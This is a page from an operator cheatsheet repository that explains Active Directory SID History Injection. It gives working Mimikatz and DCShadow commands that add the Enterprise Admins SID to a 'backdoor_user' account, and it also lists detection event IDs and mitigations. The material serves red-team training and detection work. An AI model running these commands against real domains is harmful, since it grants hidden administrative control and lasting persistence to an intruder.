daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-63-sid-history-injection.md (3066B)


      1 ---
      2 title: "Attack #63 β€” SID History Injection"
      3 description: "sIDHistory is an AD attribute designed for domain migrations β€” it preserves a user's old SID so they retain access to resources from a previous domain. An…"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory", "privilege-escalation"]
      7 tools: ["Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/🟀 Attack #63 β€” SID History Injection.md"
     11 ---
     12 # 🟀 Attack #63 β€” SID History Injection
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 `sIDHistory` is an AD attribute designed for domain migrations β€” it preserves a user's old SID so they retain access to resources from a previous domain. An attacker can **inject the SID of a privileged group** (e.g., Enterprise Admins, SID `S-1-5-21-<domain>-519`) into a normal user's `sIDHistory`, granting them those privileges without actually being a member of the group.
     19 
     20 This is typically done via Mimikatz `sid::add` or DCShadow.
     21 
     22 ***
     23 
     24 ## βš™οΈ Prerequisites
     25 
     26 | Requirement | Detail |
     27 |---|---|
     28 | **Domain Admin / SYSTEM on DC** | Required to modify sIDHistory |
     29 | **Or DCShadow capability** | Alternative injection method |
     30 
     31 ***
     32 
     33 ## πŸ’» Full Commands
     34 
     35 ```powershell
     36 # ── Mimikatz β€” inject Enterprise Admin SID into user's SID History ───────────
     37 mimikatz.exe
     38 privilege::debug
     39 sid::patch
     40 sid::add /sam:backdoor_user /new:S-1-5-21-<domain_SID>-519
     41 # 519 = Enterprise Admins
     42 # 512 = Domain Admins
     43 # 500 = Administrator RID
     44 
     45 # ── Verify ────────────────────────────────────────────────────────────────────
     46 Get-ADUser backdoor_user -Properties sIDHistory | Select sIDHistory
     47 
     48 # ── DCShadow method (stealthier) ──────────────────────────────────────────────
     49 # Terminal 1 (SYSTEM): lsadump::dcshadow /object:backdoor_user /attribute:sidHistory /value:S-1-5-21-...-519
     50 # Terminal 2 (DA): lsadump::dcshadow /push
     51 ```
     52 
     53 ***
     54 
     55 ## πŸ›‘οΈ Detection β€” Event IDs
     56 
     57 | Event ID | Source | What to Look For |
     58 |---|---|---|
     59 | **4765** | Security Log (DC) | SID History was added to an account |
     60 | **4766** | Security Log (DC) | SID History add attempt failed |
     61 | **4738** | Security Log (DC) | User account changed β€” sIDHistory modified |
     62 
     63 **Detection tip:** Query for users with `sIDHistory` populated: `Get-ADUser -Filter {sIDHistory -like "*"} -Properties sIDHistory`
     64 
     65 ***
     66 
     67 ## πŸ”— Attack Chain Context
     68 
     69 ```
     70 [SID History] ──→ Invisible Privilege Escalation via SID Injection
     71          β”‚
     72          β”œβ”€β”€β†’ πŸ”‘ User appears normal but has hidden EA/DA privileges
     73          β”œβ”€β”€β†’ πŸ”— Used for: cross-domain trust abuse (#68), persistence
     74          └──→ πŸ’€ Defeated by: audit sIDHistory, SID filtering on trusts, monitor 4765
     75 ```
     76 
     77 ***
     78 
     79 > βœ… **Attack #63 β€” SID History Injection complete.**